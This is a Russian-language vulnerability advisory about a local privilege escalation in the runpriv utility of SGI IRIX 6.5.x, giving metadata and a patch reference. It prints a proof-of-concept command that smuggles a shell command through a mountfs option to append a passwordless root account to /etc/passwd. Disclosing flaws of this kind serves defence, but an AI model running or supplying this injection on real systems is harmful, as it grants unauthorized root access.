Повышение привилегий в SGI IRIX в утилите runpriv'

Дата публикации:
14.10.2005
Всего просмотров:
851
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Локальная
Воздействие:
Повышение привилегий
Обход ограничений безопасности
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
SGI IRIX 6.5.x
Уязвимые версии: SGI IRIX 6.5.22, 6.5.27 и 6.5.28

Описание:
Уязвимость в утилите runpriv позволяет локальному пользователю повысить свои привилегии на системе.

Уязвимость существует в утилите runpriv из-за небезопасного выполнения команд после проверки привилегий пользователя. Локальный пользователь с правами на запуск приложений из директории /usr/sysadm/privbin, может выполнить произвольные команды на системе с привилегиями пользователя root. Пример для пользователя с правами на запуск утилиты mountfs:

/usr/sysadm/bin/runpriv mountfs -s test -d / -o \|
"ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'"
su r00t -c "chown root:sys /tmp/passwd123 ;
mv /tmp/passwd123 /etc/passwd ;
chmod 644 /etc/passwd ; su"

URL производителя: www.sgi.com

Решение: Установите исправление 7004 с сайта производителя.

Источник:

Ссылки: SGI IRIX runpriv Design Error Vulnerability

или введите имя

CAPTCHA